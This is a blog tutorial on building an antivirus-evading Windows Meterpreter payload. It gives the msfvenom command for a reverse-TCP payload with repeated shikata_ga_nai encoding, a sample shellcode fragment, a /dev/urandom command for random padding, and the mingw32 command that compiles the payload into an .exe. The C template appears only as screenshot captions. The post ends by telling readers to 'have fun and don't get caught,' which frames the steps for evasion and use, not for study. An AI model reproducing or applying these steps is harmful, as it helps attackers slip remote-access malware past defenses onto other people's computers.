Using Custom Cross Compiling In Metasploit To Evade Antivirus :

Basically what I will show you today is how to use a raw shellcode template written in C and msfvenom to create a slightly different signature on meterpreter this will help evade AV because the signature won’t match anything in the AV’s database. Even a slight change in any program changes the signature and the way a computer identifies the program. So with that let’s begin. first things first you need to bring up leafpad or gedit whatever text editor you prefer in your kali linux machine and type in this C code

Screenshot from 2015-02-07 12:11:24

Then save it as custom meterpreter.c or whatever you prefer. After you have saved the meterpreter.c template we need to fill in the variables random and, shellcode sections with some data they are both unsigned character arrays. By adding some randomness and compiling our own C code the hope is that would be enough to trick most antivirus programs. The random variable will introduce some randomness to the template and the shellcode variable will hold the hexadecimal bytes of the payload we create with msfvenom🙂 The main function runs when our compiled C program starts and executes our shellcode.  ok so next we create our payload using msfvenom open a terminal and type msfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT=2345 -f c -e x86/shikata_ga_nai -i 5 were LHOST and LPORT are your IP and port you want the connect back to go to on your computer. using -f switch tells msfvenom you want to generate the payload using c instead of the default ruby the -e switch tells msfvenom you want to use encoding in this case shikata_ga_nai with the -i switch we are telling msfvenom we want to use 5 iterations of encoding so moving on once you execute and create the payload you will get something like this  “\xbe\x64\x9a\x72\xbf\xdb\xdf\xd9\x74\x24\xf4\x58\x2b\xc9\xb1” it will be much longer then this but copy and paste this in your meterpreter.c or whatever name you gave your template file to the end of the line of code that reads unsigned char shellcode [ ]= so it looks like this

Screenshot from 2015-02-07 12:52:35next we must add the data for the random variable to help further obfuscate our payload we will use kali’s /dev/urandom file to generate some random numbers and characters to add randomness to our payload

go to your terminal and type in cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512  this will generate random numbers 0-9 and lower and upper case letters to output to a head command and display only the first 512 characters to the terminal once you have these random characters copy and paste them to the end of the line that reads unsigned char random[]= in your meterpreter.c file and then copy this file so that everything is saved in it, the reason i say copy is so that you always have a blank version available to quickly make a new custom meterpreter module anytime. Now to compile our program we can’t use GCC because it will compile our code to run on linux so we will have to use mingw32 if you don’t have mingw32 on your kali machine you’ll have to install it from the apt repo use apt-get install mingw32 to install it once your done then run this command in the terminal i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c this will compile your code into a payload that will run on a windows 32-bit machine.This concludes my tutorial on making a custom meterpreter module with C have fun and don’t get caught! lol


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s